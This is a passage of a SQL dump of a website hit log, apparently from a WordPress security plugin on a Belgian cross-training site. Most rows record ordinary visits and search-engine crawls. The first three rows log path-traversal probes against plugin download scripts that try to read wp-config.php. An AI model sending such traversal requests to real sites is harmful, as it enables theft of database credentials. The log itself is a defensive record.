(72174, 1494407200.702125, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72175, 1494407451.901292, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72176, 1494407943.259426, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72177, 1494412841.679724, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72178, 1494414471.670918, 1464066970, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72179, 1494414472.146893, 1464066970, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72180, 1494414472.559693, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72181, 1494414472.953098, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72182, 1494414473.364105, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72183, 1494414473.829572, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72184, 1494414474.302817, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72185, 1494414474.844366, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72186, 1494414475.357838, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72187, 1494414475.784186, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72188, 1494414476.268664, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72189, 1494417393.088220, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72190, 1494417742.679660, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72191, 1494417749.737942, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72192, 1494419316.242581, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72193, 1494419316.851030, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72194, 1494419317.383281, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72195, 1494419317.797316, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72196, 1494419318.243961, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72197, 1494419318.752208, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72198, 1494419319.444152, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72199, 1494419319.972617, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72200, 1494419320.439714, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72201, 1494419320.893451, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72202, 1494419321.419698, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72203, 1494420724.646936, 3475901859, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72204, 1494422848.130687, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72205, 1494422848.566077, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72206, 1494422848.971270, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72207, 1494422849.379686, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72208, 1494422849.936783, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72209, 1494422850.347777, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72210, 1494422850.741540, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72211, 1494422851.317292, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72212, 1494422851.740074, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72213, 1494422852.461321, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72214, 1494422852.870437, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72215, 1494422853.330106, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72216, 1494422853.737129, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72217, 1494422854.159611, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72218, 1494430163.284534, 2509962560, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(72219, 1494434245.268475, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72220, 1494434245.722611, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72221, 1494434246.208985, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72222, 1494434246.616103, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72223, 1494434247.883809, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72224, 1494434248.585475, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72225, 1494434249.853572, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72226, 1494434250.539518, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72227, 1494434251.696519, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72228, 1494434252.170971, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72229, 1494434252.592046, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72230, 1494434253.064226, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72231, 1494434253.470131, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72232, 1494434253.869937, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72233, 1494434807.002857, 2996485390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72234, 1494441279.614980, 1357699146, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(72235, 1494441281.574026, 1357699146, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(72236, 1494446098.092394, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72237, 1494446098.558729, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72238, 1494446098.995717, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72239, 1494446099.439433, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72240, 1494446100.149821, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72241, 1494446100.600406, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72242, 1494446101.023991, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72243, 1494446101.598690, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72244, 1494446102.115313, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72245, 1494446102.581661, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72246, 1494446103.087411, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72247, 1494446103.706933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72248, 1494446104.117708, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72249, 1494446104.546057, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72250, 1494447410.581438, 2919226301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(72251, 1494448820.935834, 1838094426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72252, 1494448821.490924, 1838094426, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72253, 1494448821.951247, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72254, 1494448822.423402, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72255, 1494448822.876957, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72256, 1494448823.315491, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72257, 1494448823.957893, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72258, 1494448824.437241, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72259, 1494448824.928676, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72260, 1494448825.389114, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72261, 1494448825.833034, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72262, 1494448944.168583, 1838094426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72263, 1494448944.694785, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72264, 1494448945.158716, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72265, 1494448945.608370, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72266, 1494448946.065012, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72267, 1494448946.577456, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72268, 1494448947.150742, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72269, 1494448947.605953, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72270, 1494448948.072535, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72271, 1494448948.503046, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72272, 1494448948.953975, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72273, 1494448955.957786, 1389669355, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72274, 1494448981.505341, 1389669355, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72275, 1494449052.296168, 1389669355, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72276, 1494457281.340719, 1837842937, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72277, 1494457308.605578, 1837842937, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72278, 1494461059.076773, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72279, 1494466233.186325, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-homepage-slideshow/readme.txt', 'http://crosstrainingcenter.be/wp-content/plugins/wp-homepage-slideshow/readme.txt', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72280, 1494476968.831442, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72281, 1494479253.546687, 1152705948, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(72282, 1494479300.758329, 1152705948, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(72283, 1494479987.151791, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72284, 1494479987.671507, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72285, 1494479988.124105, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72286, 1494479988.570344, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72287, 1494479988.986040, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72288, 1494479989.497478, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72289, 1494479990.008067, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72290, 1494479990.574243, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72291, 1494479991.101063, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72292, 1494479991.582393, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72293, 1494479992.094340, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72294, 1494481315.808457, 676177749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72295, 1494481316.364055, 676177749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72296, 1494483151.508925, 1538358342, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
